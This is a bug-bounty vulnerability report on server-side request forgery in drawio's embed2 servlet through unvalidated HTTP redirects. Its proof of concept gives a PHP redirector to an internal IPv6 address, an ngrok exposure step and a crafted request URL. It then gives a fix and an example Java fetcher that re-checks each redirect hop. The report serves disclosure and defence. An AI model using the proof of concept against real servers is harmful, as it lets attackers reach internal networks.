huntr / Haxatron / D1330CE8-CCCB-4BAE-B9A9-A03B97F444A5
History: May 18, 2022 - 3:08 a.m.

SSRF in embed2 servlet via redirects

2022-05-18 03:08:11
haxatron
www.huntr.dev
ssrf
embed2servlet
openconnection
redirection
vulnerability
bugbounty

EPSS

0.001

Percentile

51.0%

Description

EmbedServlet2 fetches the user-supplied URL with url.openConnection() at https://github.com/jgraph/drawio/blob/7a68ebe22a64fe722704e9c4527791209fee2034/src/main/java/com/mxgraph/online/EmbedServlet2.java#L400. The HttpURLConnection returned there follows HTTP redirects by default, and the redirect targets are never validated, so a fetch URL that passes the initial check can redirect the server to an arbitrary internal address (SSRF).

Proof of Concept

1: Host a redirector (redirect.php) and expose it with ngrok

redirect.php:

<?php
header("Location: http://[fe80::1]");

Expose it:

ngrok http 80

2: Request the embed2 endpoint with fetch pointing at the ngrok URL; the server follows the redirect and its request goes to fe80::1

https://[DIAGRAMS-SERVER]/embed2.js?fetch=http://[NGROK-ID].ngrok.io/redirect.php

Recommended Fix

Call setInstanceFollowRedirects(false) on the HttpURLConnection returned by url.openConnection() in EmbedServlet2, so that a redirect is returned to the caller rather than silently followed by the server.
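The following is an added example, not drawio's code and not the fix the project shipped. It shows the recommended setInstanceFollowRedirects(false) call in context, and goes one step further than the report: instead of dropping redirects entirely, it follows them by hand so that every hop is re-validated against the same scheme and address checks applied to the first URL. Class and method names (SafeFetch, isPublicTarget, open) and the hop limit are assumptions for illustration.

```java
import java.io.IOException;
import java.net.HttpURLConnection;
import java.net.Inet6Address;
import java.net.InetAddress;
import java.net.URL;
import java.net.UnknownHostException;

// Added example (not drawio's code): fetch a URL without letting
// HttpURLConnection follow redirects on its own; each hop is re-checked.
public final class SafeFetch {
    private static final int MAX_HOPS = 3;   // assumed limit for this example

    // Reject hosts that resolve to non-public addresses: loopback, link-local
    // (this covers fe80::1 from the report and 169.254.x.x), RFC1918/site-local,
    // wildcard, multicast, and IPv6 unique-local (fc00::/7), which
    // isSiteLocalAddress() does not flag.
    static boolean isPublicTarget(URL url) throws UnknownHostException {
        String host = url.getHost();
        if (host == null || host.isEmpty()) return false;
        // URL.getHost() keeps the brackets on IPv6 literals; strip them first.
        if (host.startsWith("[") && host.endsWith("]")) {
            host = host.substring(1, host.length() - 1);
        }
        for (InetAddress addr : InetAddress.getAllByName(host)) {
            if (addr.isLoopbackAddress() || addr.isLinkLocalAddress()
                    || addr.isSiteLocalAddress() || addr.isAnyLocalAddress()
                    || addr.isMulticastAddress()) {
                return false;
            }
            if (addr instanceof Inet6Address
                    && (addr.getAddress()[0] & 0xfe) == 0xfc) {
                return false;   // unique-local fc00::/7
            }
        }
        return true;
    }

    static boolean isAllowedScheme(URL url) {
        String p = url.getProtocol();
        return "http".equals(p) || "https".equals(p);
    }

    static boolean isRedirect(int status) {
        return status == 301 || status == 302 || status == 303
                || status == 307 || status == 308;
    }

    // Opens the final connection, throwing if any hop is disallowed.
    static HttpURLConnection open(String start) throws IOException {
        URL current = new URL(start);
        for (int hop = 0; hop <= MAX_HOPS; hop++) {
            if (!isAllowedScheme(current) || !isPublicTarget(current)) {
                throw new IOException("blocked target: " + current);
            }
            HttpURLConnection conn = (HttpURLConnection) current.openConnection();
            conn.setInstanceFollowRedirects(false);   // the fix from the report
            conn.setConnectTimeout(5000);
            conn.setReadTimeout(5000);
            int status = conn.getResponseCode();
            if (!isRedirect(status)) {
                return conn;                          // not a redirect: done
            }
            String location = conn.getHeaderField("Location");
            conn.disconnect();
            if (location == null) {
                throw new IOException("redirect without Location header");
            }
            current = new URL(current, location);     // resolves relative Location
        }
        throw new IOException("too many redirects from " + start);
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs: both are rejected before any connection is made.
        System.out.println(isPublicTarget(new URL("http://[fe80::1]/")));
        System.out.println(isPublicTarget(new URL("http://127.0.0.1/")));
    }
}
```

One caveat worth knowing when adopting this pattern: isPublicTarget resolves the name and the later openConnection() resolves it again, so a hostname whose DNS answer changes between the two lookups (DNS rebinding) can still reach an internal address. Pinning the connection to the address that passed the check, or resolving once and connecting by IP with the Host header set explicitly, closes that gap.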
